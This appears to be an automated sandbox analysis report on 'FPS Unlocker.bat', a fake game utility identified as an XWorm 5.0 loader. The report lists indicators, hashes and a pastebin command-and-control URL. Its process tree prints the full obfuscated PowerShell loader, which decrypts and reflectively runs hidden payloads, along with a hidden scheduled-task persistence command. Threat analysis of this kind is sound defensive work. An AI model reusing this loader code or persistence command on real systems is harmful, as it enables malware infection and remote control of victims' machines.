Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10/10/2024, 05:13
Static task
static1
Behavioral task
behavioral1
Sample
FPS Unlocker.bat
Resource
win7-20240903-en
General
-
Target
FPS Unlocker.bat
-
Size
58KB
-
MD5
fdcd595fc134f6bd095d5b34ffd3b71f
-
SHA1
ba04fa3f61319022e0c440f1824cd3de9b31942b
-
SHA256
5ab4907cb69c12aba76ffd0df1d013abf6caee8c9f9b82855ed548e5e6aba649
-
SHA512
810903554bd118c0496b3b057bb52ee65a61fc77bb93b2f278e81542ff24087a7eec3b3d6f0dd4dffea8f6c8afbbbbbeb4479a11c7eef5c6a632e200bbe4f6a1
-
SSDEEP
1536:LT5d8DaHBOodkL16YbyEjEiQQ/MhQbE55q5YsmrI5e:LLBH21DjE/hQbEqzLe
Malware Config
Extracted
xworm
5.0
00BaklpoEsEvi6Pr
-
Install_directory
%AppData%
-
install_file
Fortnite.exe
-
pastebin_url
https://pastebin.com/raw/mUZNKkBb
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/100-49-0x000001C2C4280000-0x000001C2C4290000-memory.dmp family_xworm -
Blocklisted process makes network request 8 IoCs
flow pid Process 22 100 powershell.exe 24 100 powershell.exe 28 100 powershell.exe 40 100 powershell.exe 41 100 powershell.exe 47 100 powershell.exe 48 100 powershell.exe 53 100 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 556 powershell.exe 700 powershell.exe 100 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fortnite.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fortnite.lnk powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 100 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 pastebin.com 22 pastebin.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\ powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 556 powershell.exe 556 powershell.exe 700 powershell.exe 700 powershell.exe 100 powershell.exe 100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeIncreaseQuotaPrivilege 700 powershell.exe Token: SeSecurityPrivilege 700 powershell.exe Token: SeTakeOwnershipPrivilege 700 powershell.exe Token: SeLoadDriverPrivilege 700 powershell.exe Token: SeSystemProfilePrivilege 700 powershell.exe Token: SeSystemtimePrivilege 700 powershell.exe Token: SeProfSingleProcessPrivilege 700 powershell.exe Token: SeIncBasePriorityPrivilege 700 powershell.exe Token: SeCreatePagefilePrivilege 700 powershell.exe Token: SeBackupPrivilege 700 powershell.exe Token: SeRestorePrivilege 700 powershell.exe Token: SeShutdownPrivilege 700 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeSystemEnvironmentPrivilege 700 powershell.exe Token: SeRemoteShutdownPrivilege 700 powershell.exe Token: SeUndockPrivilege 700 powershell.exe Token: SeManageVolumePrivilege 700 powershell.exe Token: 33 700 powershell.exe Token: 34 700 powershell.exe Token: 35 700 powershell.exe Token: 36 700 powershell.exe Token: SeIncreaseQuotaPrivilege 700 powershell.exe Token: SeSecurityPrivilege 700 powershell.exe Token: SeTakeOwnershipPrivilege 700 powershell.exe Token: SeLoadDriverPrivilege 700 powershell.exe Token: SeSystemProfilePrivilege 700 powershell.exe Token: SeSystemtimePrivilege 700 powershell.exe Token: SeProfSingleProcessPrivilege 700 powershell.exe Token: SeIncBasePriorityPrivilege 700 powershell.exe Token: SeCreatePagefilePrivilege 700 powershell.exe Token: SeBackupPrivilege 700 powershell.exe Token: SeRestorePrivilege 700 powershell.exe Token: SeShutdownPrivilege 700 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeSystemEnvironmentPrivilege 700 powershell.exe Token: SeRemoteShutdownPrivilege 700 powershell.exe Token: SeUndockPrivilege 700 powershell.exe Token: SeManageVolumePrivilege 700 powershell.exe Token: 33 700 powershell.exe Token: 34 700 powershell.exe Token: 35 700 powershell.exe Token: 36 700 powershell.exe Token: SeIncreaseQuotaPrivilege 700 powershell.exe Token: SeSecurityPrivilege 700 powershell.exe Token: SeTakeOwnershipPrivilege 700 powershell.exe Token: SeLoadDriverPrivilege 700 powershell.exe Token: SeSystemProfilePrivilege 700 powershell.exe Token: SeSystemtimePrivilege 700 powershell.exe Token: SeProfSingleProcessPrivilege 700 powershell.exe Token: SeIncBasePriorityPrivilege 700 powershell.exe Token: SeCreatePagefilePrivilege 700 powershell.exe Token: SeBackupPrivilege 700 powershell.exe Token: SeRestorePrivilege 700 powershell.exe Token: SeShutdownPrivilege 700 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeSystemEnvironmentPrivilege 700 powershell.exe Token: SeRemoteShutdownPrivilege 700 powershell.exe Token: SeUndockPrivilege 700 powershell.exe Token: SeManageVolumePrivilege 700 powershell.exe Token: 33 700 powershell.exe Token: 34 700 powershell.exe Token: 35 700 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 100 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3896 wrote to memory of 556 3896 cmd.exe 88 PID 3896 wrote to memory of 556 3896 cmd.exe 88 PID 556 wrote to memory of 700 556 powershell.exe 90 PID 556 wrote to memory of 700 556 powershell.exe 90 PID 556 wrote to memory of 2108 556 powershell.exe 92 PID 556 wrote to memory of 2108 556 powershell.exe 92 PID 2108 wrote to memory of 4960 2108 WScript.exe 93 PID 2108 wrote to memory of 4960 2108 WScript.exe 93 PID 4960 wrote to memory of 100 4960 cmd.exe 95 PID 4960 wrote to memory of 100 4960 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FPS Unlocker.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('02dT/qDjBObYCIde39bhpxP7Rv4WFyCQXO19DwqYNvk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/DJ3kbH9oCvlgtuTzC7x8A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RiEgk=New-Object System.IO.MemoryStream(,$param_var); $UYezQ=New-Object System.IO.MemoryStream; $vneVX=New-Object System.IO.Compression.GZipStream($RiEgk, [IO.Compression.CompressionMode]::Decompress); $vneVX.CopyTo($UYezQ); $vneVX.Dispose(); $RiEgk.Dispose(); $UYezQ.Dispose(); $UYezQ.ToArray();}function execute_function($param_var,$param2_var){ $eLMOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dGEdy=$eLMOd.EntryPoint; $dGEdy.Invoke($null, $param2_var);}$UZgKG = 'C:\Users\Admin\AppData\Local\Temp\FPS Unlocker.bat';$host.UI.RawUI.WindowTitle = $UZgKG;$hmELN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UZgKG).Split([Environment]::NewLine);foreach ($vRlkd in $hmELN) { if ($vRlkd.StartsWith(':: ')) { $RMfcd=$vRlkd.Substring(3); break; }}$payloads_var=[string[]]$RMfcd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_255_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_255.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_255.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_255.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('02dT/qDjBObYCIde39bhpxP7Rv4WFyCQXO19DwqYNvk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/DJ3kbH9oCvlgtuTzC7x8A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RiEgk=New-Object System.IO.MemoryStream(,$param_var); $UYezQ=New-Object System.IO.MemoryStream; $vneVX=New-Object System.IO.Compression.GZipStream($RiEgk, [IO.Compression.CompressionMode]::Decompress); $vneVX.CopyTo($UYezQ); $vneVX.Dispose(); $RiEgk.Dispose(); $UYezQ.Dispose(); $UYezQ.ToArray();}function execute_function($param_var,$param2_var){ $eLMOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dGEdy=$eLMOd.EntryPoint; $dGEdy.Invoke($null, $param2_var);}$UZgKG = 'C:\Users\Admin\AppData\Roaming\startup_str_255.bat';$host.UI.RawUI.WindowTitle = $UZgKG;$hmELN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UZgKG).Split([Environment]::NewLine);foreach ($vRlkd in $hmELN) { if ($vRlkd.StartsWith(':: ')) { $RMfcd=$vRlkd.Substring(3); break; }}$payloads_var=[string[]]$RMfcd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:100
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5eaa37f52aea06b09f25bf372644caa78
SHA13169bed248b204a5ac430bc1dee92e156b586cbb
SHA25640dd61cdf8dcaa558901712c6c0377cfe0c30cf5db14d2d951c556a107dc6ec2
SHA512125e7b974953efb0d631a00a67742da3abc60c5231435392b4668299aa10cbda08063fe39f0ab2e9f5c933ddf65f58e097e75cb9b8e95b6dfd42ea1cf171a0de
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
100KB
MD51b942faa8e8b1008a8c3c1004ba57349
SHA1cd99977f6c1819b12b33240b784ca816dfe2cb91
SHA256555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc
SHA5125aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43
-
Filesize
58KB
MD5fdcd595fc134f6bd095d5b34ffd3b71f
SHA1ba04fa3f61319022e0c440f1824cd3de9b31942b
SHA2565ab4907cb69c12aba76ffd0df1d013abf6caee8c9f9b82855ed548e5e6aba649
SHA512810903554bd118c0496b3b057bb52ee65a61fc77bb93b2f278e81542ff24087a7eec3b3d6f0dd4dffea8f6c8afbbbbbeb4479a11c7eef5c6a632e200bbe4f6a1
-
Filesize
115B
MD500b6d4b686b4c77d3df162d1d0e1690a
SHA158ecd61148c0a5ced748fd3f59dae56c58bd07d2
SHA2569dbe56a8dc1f928f752db0e772fb00a11c9047a5ea7a5a9473cb571a89f02891
SHA51239d630b94c4b9f6a4e03bb5478d1a4e31fb404835282698c810b3861af5ad9c72a778cc0030cd7744c9bb4441e3598b1c5549b8344de08da37d913ef4046b040